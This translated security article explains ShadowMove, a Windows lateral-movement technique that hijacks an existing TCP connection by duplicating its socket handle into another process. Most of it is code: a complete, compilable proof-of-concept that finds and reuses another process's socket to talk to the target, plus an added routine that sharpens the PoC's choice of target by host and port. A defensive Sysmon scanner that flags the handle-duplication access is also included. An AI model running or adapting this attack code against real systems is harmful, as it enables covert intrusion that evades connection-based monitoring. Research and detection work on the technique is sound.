How to understand ShadowMove's new lateral movement technique: lateral movement by duplicating an existing socket

2025-04-01 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 06/03 Report

This article explains ShadowMove, a lateral movement technique that reuses an existing TCP connection by duplicating its socket into another process instead of opening a new connection. The method is simple and practical; the sections below cover how it works, a proof of concept, and how to test it.

Technical Overview

The figure below is a simple flow chart of how the technique works and how it can be tested in a lab environment. In the figure, ShadowMove is used to communicate between the source host and the target host. The details are as follows:

On the left is a host that has already been compromised (for example, through a phishing attack), with IP address 192.168.1.117. This is the source host from which lateral movement starts, and it is used to attack the host with IP address 192.168.56.102.

On the right is the target host, 192.168.56.102. It has a listening socket on TCP port 80, created with the command nc -lvp 80.

The source host, 192.168.1.117, has an established connection to the target host, 192.168.56.102, made with nc.exe.

On the source host there is a running process named ShadowMove.exe, which performs the ShadowMove lateral movement. The important point is that it never establishes a connection to the remote host at any point in its lifetime; that is what makes the technique unusual.

On the source host, ShadowMove.exe enumerates all handles held by nc.exe and looks for handles to \Device\Afd, the Ancillary Function Driver device that backs Windows sockets. To do so it must open nc.exe with the PROCESS_DUP_HANDLE right, so it has to run in a context that is allowed to open that process (normally the same user). For each candidate it finds, it calls WSADuplicateSocketW and WSASocket to duplicate the socket into its own process. Once the shared socket exists, it calls getpeername to check whether the socket's remote address is the target host, 192.168.56.102.

Once a shared socket pointing to the target host has been created from the \Device\Afd handle, ShadowMove.exe can write data to it with send and read data from it with recv.

To repeat: ShadowMove.exe never creates a TCP connection to the target host. It directly reuses the existing socket between the source host and the target host (192.168.56.102:80), and that is the key to this lateral movement technique.
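Because the technique never calls connect(), connection-oriented telemetry (netstat, Sysmon Event ID 3) attributes the session to nc.exe alone. What it cannot avoid is opening nc.exe with PROCESS_DUP_HANDLE (0x0040), which Sysmon records as Event ID 10 (ProcessAccess) together with the GrantedAccess mask, provided the Sysmon configuration does not filter those events out. The C program below is an added example, not part of the original article or of the ShadowMove PoC: it scans constructed Event 10 records (the one-line key=value layout, the image paths and the allowlist of source images are assumptions made for the example; real Sysmon output is XML/EVTX, and the paths here contain no spaces) and reports non-allowlisted processes that obtained the duplicate-handle right on another process.

```c
/* Added example, not part of the original article or of the ShadowMove PoC.
 * ShadowMove never calls connect(), so connection telemetry attributes the
 * session to nc.exe. It must, however, open nc.exe with PROCESS_DUP_HANDLE
 * (0x0040), which Sysmon records as Event ID 10 (ProcessAccess) with the
 * GrantedAccess mask. This scanner reads Event 10 records in a constructed
 * one-line key=value form (an assumption for the example; real Sysmon output
 * is XML/EVTX, and paths here contain no spaces) and reports sources that
 * obtained the duplicate-handle right on another process. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PROCESS_DUP_HANDLE 0x0040u   /* Win32 process access right */

/* Constructed sample records (not real logs). */
static const char *const SAMPLE_EVENTS[] = {
    "EventID=10 SourceImage=C:\\Windows\\System32\\csrss.exe TargetImage=C:\\Tools\\nc.exe GrantedAccess=0x1FFFFF",
    "EventID=10 SourceImage=C:\\Users\\bob\\ShadowMove.exe TargetImage=C:\\Tools\\nc.exe GrantedAccess=0x40",
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Tools\\nc.exe GrantedAccess=0x1000",
    "EventID=10 SourceImage=C:\\Users\\bob\\ShadowMove.exe TargetImage=C:\\Tools\\nc.exe GrantedAccess=0x1410",
    "EventID=3 Image=C:\\Tools\\nc.exe DestinationIp=192.168.56.102 DestinationPort=80",
    NULL
};

/* Sources that legitimately hold PROCESS_DUP_HANDLE on other processes
 * (assumed allowlist; tune it per environment). */
static const char *const ALLOWLIST[] = { "csrss.exe", "lsass.exe", "MsMpEng.exe", NULL };

/* Copy the value of "key=" from a record; returns 1 if the key is present.
 * The key is matched at the start of the line or after a space, so "Image="
 * does not match inside "TargetImage=". */
static int get_field(const char *line, const char *key, char *out, size_t outlen)
{
    size_t klen = strlen(key);
    const char *p = line;
    for (;;) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=' && (p == line || p[-1] == ' ')) {
            p += klen + 1;
            size_t n = strcspn(p, " ");
            if (n >= outlen) n = outlen - 1;
            memcpy(out, p, n);
            out[n] = '\0';
            return 1;
        }
        p = strchr(p, ' ');
        if (p == NULL) return 0;
        p++;
    }
}

static int ci_equal(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == *b;
}

/* Compare the basename of the source image against the allowlist, case-insensitively. */
static int is_allowlisted_source(const char *image)
{
    const char *base = strrchr(image, '\\');
    base = base ? base + 1 : image;
    for (size_t i = 0; ALLOWLIST[i]; i++)
        if (ci_equal(base, ALLOWLIST[i])) return 1;
    return 0;
}

/* 1 if the record is an Event 10 whose GrantedAccess includes PROCESS_DUP_HANDLE. */
int grants_dup_handle(const char *line)
{
    char id[16], acc[32];
    if (!get_field(line, "EventID", id, sizeof id) || strcmp(id, "10") != 0) return 0;
    if (!get_field(line, "GrantedAccess", acc, sizeof acc)) return 0;
    unsigned long mask = strtoul(acc, NULL, 16);   /* base 16 accepts the 0x prefix */
    return (mask & PROCESS_DUP_HANDLE) != 0;
}

/* Scan records; store "source -> target" for each non-allowlisted hit; return the hit count. */
int scan_dup_handle_events(const char *const *lines, char hits[][256], int max_hits)
{
    int n = 0;
    for (size_t i = 0; lines[i]; i++) {
        char src[120], dst[120];
        if (!grants_dup_handle(lines[i])) continue;
        if (!get_field(lines[i], "SourceImage", src, sizeof src)) continue;
        if (is_allowlisted_source(src)) continue;
        if (!get_field(lines[i], "TargetImage", dst, sizeof dst)) strcpy(dst, "?");
        if (n < max_hits) snprintf(hits[n], 256, "%s -> %s", src, dst);
        n++;
    }
    return n;
}

int main(void)
{
    char hits[8][256];
    int n = scan_dup_handle_events(SAMPLE_EVENTS, hits, 8);
    for (int i = 0; i < n && i < 8; i++)
        printf("[!] PROCESS_DUP_HANDLE granted: %s\n", hits[i]);
    printf("%d suspicious handle-duplication event(s)\n", n);
    return 0;
}
```

Masks such as 0x1FFFFF (PROCESS_ALL_ACCESS) also contain the 0x40 bit, which is why the allowlist matters: debuggers, security agents and csrss.exe request such masks routinely. In a real deployment the process holding the connection need not be nc.exe (it could be a browser, an RDP client or a management agent), so the detection should key on the GrantedAccess bit and the reputation of the source, not on the target's name.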

PoC code

The following PoC was written by security researcher Juan Manuel Fernández (@TheXC3LL). I made some modifications so that it compiles in a Visual Studio 2019 development environment:

```c
// PoC of ShadowMove Gateway by Juan Manuel Fernández (@TheXC3LL)
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <winsock2.h>
#include <ws2tcpip.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "WS2_32")

// Most of the code is adapted from https://github.com/Zer0Mem0ry/WindowsNT-Handle-Scanner/blob/master/FindHandles/main.cpp
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
#define SystemHandleInformation 16
#define ObjectNameInformation 1

// NTSTATUS is not declared by windows.h unless winternl.h is included, and
// winternl.h would clash with the structures declared below.
typedef LONG NTSTATUS;

typedef NTSTATUS(NTAPI* _NtQuerySystemInformation)(
    ULONG SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength);

typedef NTSTATUS(NTAPI* _NtDuplicateObject)(
    HANDLE SourceProcessHandle,
    HANDLE SourceHandle,
    HANDLE TargetProcessHandle,
    PHANDLE TargetHandle,
    ACCESS_MASK DesiredAccess,
    ULONG Attributes,
    ULONG Options);

typedef NTSTATUS(NTAPI* _NtQueryObject)(
    HANDLE ObjectHandle,
    ULONG ObjectInformationClass,
    PVOID ObjectInformation,
    ULONG ObjectInformationLength,
    PULONG ReturnLength);

// One entry of the system-wide handle table returned by SystemHandleInformation
typedef struct _SYSTEM_HANDLE {
    ULONG ProcessId;
    BYTE ObjectTypeNumber;
    BYTE Flags;
    USHORT Handle;
    PVOID Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG HandleCount;
    SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

// Length and MaximumLength are in bytes; Buffer is not guaranteed to be NUL-terminated
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef enum _POOL_TYPE {
    NonPagedPool,
    PagedPool,
    NonPagedPoolMustSucceed,
    DontUseThisType,
    NonPagedPoolCacheAligned,
    PagedPoolCacheAligned,
    NonPagedPoolCacheAlignedMustS
} POOL_TYPE, * PPOOL_TYPE;

typedef struct _OBJECT_NAME_INFORMATION {
    UNICODE_STRING Name;
} OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;

PVOID GetLibraryProcAddress(const char* LibraryName, const char* ProcName) {
    return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}

// Walk the handles of dwProcessId, duplicate every \Device\Afd (socket) handle into this
// process and return the first one whose peer address equals dstIP
SOCKET findTargetSocket(DWORD dwProcessId, LPSTR dstIP) {
    HANDLE hProc;
    PSYSTEM_HANDLE_INFORMATION handleInfo;
    DWORD handleInfoSize = 0x10000;
    NTSTATUS status;
    DWORD returnLength;
    WSAPROTOCOL_INFOW wsaProtocolInfo = { 0 };
    SOCKET targetSocket;

    // Open target process with PROCESS_DUP_HANDLE rights
    hProc = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);
    if (!hProc) {
        printf("[!] Error: could not open the process!\n");
        exit(-1);
    }
    printf("[+] Handle to process obtained!\n");

    // Find the functions
    _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetLibraryProcAddress("ntdll.dll", "NtQuerySystemInformation");
    _NtDuplicateObject NtDuplicateObject = (_NtDuplicateObject)GetLibraryProcAddress("ntdll.dll", "NtDuplicateObject");
    _NtQueryObject NtQueryObject = (_NtQueryObject)GetLibraryProcAddress("ntdll.dll", "NtQueryObject");

    // Retrieve the system handle table (grow the buffer until it fits)
    handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
    while ((status = NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL)) == STATUS_INFO_LENGTH_MISMATCH)
        handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
    printf("[+] Found [%lu] handles in PID %lu\n=============================\n", handleInfo->HandleCount, dwProcessId);

    // Iterate
    for (DWORD i = 0; i < handleInfo->HandleCount; i++) {
        // Check if it is the desired type of handle (0x24 was the "File" object type index on the
        // author's test system; the index differs between Windows builds)
        if (handleInfo->Handles[i].ObjectTypeNumber != 0x24) continue;

        SYSTEM_HANDLE handle = handleInfo->Handles[i];
        HANDLE dupHandle = NULL;
        POBJECT_NAME_INFORMATION objectNameInfo;

        // Duplicate the handle into our process. The table lists handles of every process,
        // so a value that does not exist in the target process simply fails here.
        status = NtDuplicateObject(hProc, (HANDLE)(ULONG_PTR)handle.Handle, GetCurrentProcess(), &dupHandle, PROCESS_ALL_ACCESS, FALSE, DUPLICATE_SAME_ACCESS);
        if (status < 0 || dupHandle == NULL) continue;

        objectNameInfo = (POBJECT_NAME_INFORMATION)malloc(0x1000);
        // Get the object name; socket handles are named "\Device\Afd"
        status = NtQueryObject(dupHandle, ObjectNameInformation, objectNameInfo, 0x1000, &returnLength);

        // Narrow the search: Name.Length is in bytes, len(L"\Device\Afd") == 11 * 2
        if (status >= 0 && objectNameInfo->Name.Length == 22) {
            printf("[-] Testing %lu of %lu\n", i, handleInfo->HandleCount);
            // Check if it ends in "Afd" (characters 8..10 of the name)
            PWSTR needle = objectNameInfo->Name.Buffer + 8;
            if (needle[0] == L'A' && needle[1] == L'f' && needle[2] == L'd') {
                // We got a candidate
                printf("\t[*] \\Device\\Afd found at %lu!\n", i);
                // Try to duplicate the socket
                if (WSADuplicateSocketW((SOCKET)dupHandle, GetCurrentProcessId(), &wsaProtocolInfo) != 0) {
                    printf("\t\t[X] Error duplicating socket!\n");
                } else {
                    // We got it?
                    targetSocket = WSASocketW(wsaProtocolInfo.iAddressFamily, wsaProtocolInfo.iSocketType, wsaProtocolInfo.iProtocol, &wsaProtocolInfo, 0, WSA_FLAG_OVERLAPPED);
                    if (targetSocket != INVALID_SOCKET) {
                        struct sockaddr_in sockaddr;
                        int len = sizeof(SOCKADDR_IN);
                        // Is this the socket? Compare the peer address with the requested target
                        if (getpeername(targetSocket, (SOCKADDR*)&sockaddr, &len) == 0 &&
                            strcmp(inet_ntoa(sockaddr.sin_addr), dstIP) == 0) {
                            printf("\t[*] Duplicated socket (%s)\n", inet_ntoa(sockaddr.sin_addr));
                            free(objectNameInfo);
                            CloseHandle(dupHandle);
                            CloseHandle(hProc);
                            free(handleInfo);
                            return targetSocket;
                        }
                        closesocket(targetSocket);   // a socket, but not the one we want
                    }
                }
            }
        }
        free(objectNameInfo);
        CloseHandle(dupHandle);
    }
    CloseHandle(hProc);
    free(handleInfo);
    return INVALID_SOCKET;
}

int main(int argc, char** argv) {
    WSADATA wsaData;
    DWORD dwProcessId;
    LPSTR dstIP;
    SOCKET targetSocket;
    char buff[255] = { 0 };
    const char* msg = "hello from shadowmove and reused socket!\n";

    printf("\t\t\t-=[ShadowMove Gateway PoC]=-\n\n");

    // smgateway.exe [PID] [IP dst]
    /* It's just a PoC, we do not validate the args. But at least check if number of args is right X) */
    if (argc != 3) {
        printf("[!] Error: syntax is %s [PID] [IP dst]\n", argv[0]);
        exit(-1);
    }
    dwProcessId = strtoul(argv[1], NULL, 10);
    dstIP = _strdup(argv[2]);

    // Classic
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    targetSocket = findTargetSocket(dwProcessId, dstIP);
    if (targetSocket == INVALID_SOCKET) {
        printf("[!] No established socket to %s found in PID %lu\n", dstIP, dwProcessId);
        WSACleanup();
        return 1;
    }
    // Talk over the reused socket: this process never calls connect()
    send(targetSocket, msg, (int)strlen(msg), 0);
    recv(targetSocket, buff, sizeof(buff) - 1, 0);
    printf("\n[*] Message from target to shadowmove:\n\n%s\n", buff);
    closesocket(targetSocket);
    WSACleanup();
    return 0;
}
```

Demo

After compiling the code above, it can be tested. The following demonstration shows the ShadowMove lateral movement technique in practice:
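Two filters decide which handle the PoC above ends up reusing: the object-name test (Name.Length == 22 and "Afd" at character 8) and the peer test (strcmp of the inet_ntoa output against the command-line string, with no port check). The C program below is an added example, not the PoC's own code: it reimplements both filters so they can be compiled and unit-tested outside Windows. UNICODE_STRING16 is a local stand-in for the Windows UNICODE_STRING with 16-bit code units (an assumption so that the file also builds with non-Windows compilers; on Windows the SDK definition would be used), the object name is compared in full and case-insensitively, and the peer check parses a host:port specification, compares the address in binary form and requires the port to match, so an unrelated session to the same host is not hijacked.

```c
/* Added example, not the PoC's own code: the two candidate filters of the
 * ShadowMove PoC, hardened and made portable so they can be unit-tested.
 * UNICODE_STRING16 mirrors the Windows UNICODE_STRING (16-bit code units,
 * byte-counted Length, no terminator guaranteed); it is declared locally as
 * an assumption so the file also builds on non-Windows compilers. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#include <ws2tcpip.h>
#else
#include <arpa/inet.h>
#include <netinet/in.h>
#endif

typedef struct {
    uint16_t  Length;        /* in BYTES, not characters */
    uint16_t  MaximumLength;
    uint16_t *Buffer;        /* UTF-16 code units, like PWSTR; no NUL guaranteed */
} UNICODE_STRING16;

static uint16_t lower16(uint16_t c)
{
    return (c >= 'A' && c <= 'Z') ? (uint16_t)(c + ('a' - 'A')) : c;
}

/* Full, length-bounded, case-insensitive comparison against "\Device\Afd".
 * Object Manager names are case-insensitive, so "\DEVICE\AFD" also matches;
 * "\Device\Af" (truncated) or "\Device\Afd0" (longer) do not. */
int is_afd_device_name(const UNICODE_STRING16 *name)
{
    static const char needle[] = "\\Device\\Afd";
    size_t n = strlen(needle);
    if (name->Buffer == NULL || name->Length != n * sizeof(uint16_t)) return 0;
    for (size_t i = 0; i < n; i++)
        if (lower16(name->Buffer[i]) != lower16((uint16_t)(unsigned char)needle[i])) return 0;
    return 1;
}

/* Helper for tests: build a UNICODE_STRING16 from ASCII into caller storage,
 * deliberately without a terminator, as NtQueryObject may return it. */
UNICODE_STRING16 make_name(const char *ascii, uint16_t *buf, size_t cap)
{
    UNICODE_STRING16 s;
    size_t n = strlen(ascii);
    if (n > cap) n = cap;
    for (size_t i = 0; i < n; i++) buf[i] = (uint16_t)(unsigned char)ascii[i];
    s.Length = (uint16_t)(n * sizeof(uint16_t));
    s.MaximumLength = (uint16_t)(cap * sizeof(uint16_t));
    s.Buffer = buf;
    return s;
}

/* Peer filter. The PoC does strcmp(inet_ntoa(peer), dstIP) and ignores the
 * port, so "192.168.056.102" never matches and any session to the host is
 * accepted. This version parses "host:port", compares the address in binary
 * and requires the port to match. */
int peer_matches(const struct sockaddr_in *peer, const char *spec)
{
    char host[64];
    const char *colon = strrchr(spec, ':');
    if (colon == NULL || (size_t)(colon - spec) >= sizeof host) return 0;
    memcpy(host, spec, (size_t)(colon - spec));
    host[colon - spec] = '\0';

    char *end;
    unsigned long port = strtoul(colon + 1, &end, 10);
    if (*(colon + 1) == '\0' || *end != '\0' || port == 0 || port > 65535) return 0;

    struct in_addr want;
    if (inet_pton(AF_INET, host, &want) != 1) return 0;
    return peer->sin_family == AF_INET
        && peer->sin_addr.s_addr == want.s_addr
        && ntohs(peer->sin_port) == (uint16_t)port;
}

int main(void)
{
    uint16_t buf[32];
    UNICODE_STRING16 afd = make_name("\\Device\\Afd", buf, 32);
    printf("is_afd_device_name(\"\\\\Device\\\\Afd\") = %d\n", is_afd_device_name(&afd));

    struct sockaddr_in peer;
    memset(&peer, 0, sizeof peer);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(80);
    inet_pton(AF_INET, "192.168.56.102", &peer.sin_addr);   /* the lab target from the article */
    printf("peer 192.168.56.102:80 matches 192.168.56.102:80 -> %d\n", peer_matches(&peer, "192.168.56.102:80"));
    printf("peer 192.168.56.102:80 matches 192.168.56.102:443 -> %d\n", peer_matches(&peer, "192.168.56.102:443"));
    return 0;
}
```

Because Name.Length counts bytes and the buffer carries no guaranteed terminator, any string routine that expects one (wcscmp, wcslen) on Name.Buffer is wrong; the length-bounded loop is the safe form. The PoC's check works on its test system because the name is exactly "\Device\Afd", but the hardened comparison costs nothing and does not depend on the name happening to be 22 bytes long.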

That covers ShadowMove lateral movement by duplicating an existing socket; reproducing the scenario above in a lab is the best way to understand it.
